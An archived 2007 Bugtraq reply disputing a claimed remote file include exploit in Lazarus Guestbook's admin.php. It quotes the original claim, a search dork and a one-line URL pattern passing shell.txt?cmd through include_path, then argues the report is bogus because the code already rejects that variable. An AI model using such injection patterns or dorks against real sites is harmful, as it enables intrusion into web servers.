| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 07 Mar 2007 19:23:46 -0600
From: Mailinglists Address <mailinglist@...resshosting.net>
To: c_r_ck@...mail.com
Cc: bugtraq@...urityfocus.com
Subject: Re: [Bogus] Lazarus Guestbook (admin.php)Remote File Include Expliot
-
c_r_ck@...mail.com wrote:
> # Lazarus Guestbook (admin.php)Remote File Include Expliot
> # D.Script: http://www.carbonize.co.uk
> # Dork: "Powered by Lazarus Guestbook from carbonize.co.uk"
> # Discovered by Crack_man
> # Homepage: http://www.b0rizq.biz
> # Greetz To :B0rizq & red_casper & Draknaz kaiba & broken_proxy and all freind
>
> # Exploit:
> # [VicTim]/[path]/admin.php?include_path=shell.txt?cmd
>
> ===========================
>
>
With the lack of version information in this report it is hard for me to
say if the version I downloaded was already a patched version, or if
(based on previous history of these types of posts) this is just another
bogus report where the reviewer didn't actually look at the code, and
just posted based on the fact that there was a variable used in an
include (require, include_once, require_once, fopen, etc...) call.
Looking at line 36 of the admin.php script you can see the following:
if (isset($include_path))
{
die("Hacking Attempt!");
}
$include_path = dirname(__FILE__);
So... either it is patched in the version I am looking at (unlikely) or
this is a bogus report (like god knows how many others).
Tom Walsh
Express Web Systems, Inc.
http://www.expresswebsystems.com/
Powered by blists - more mailing lists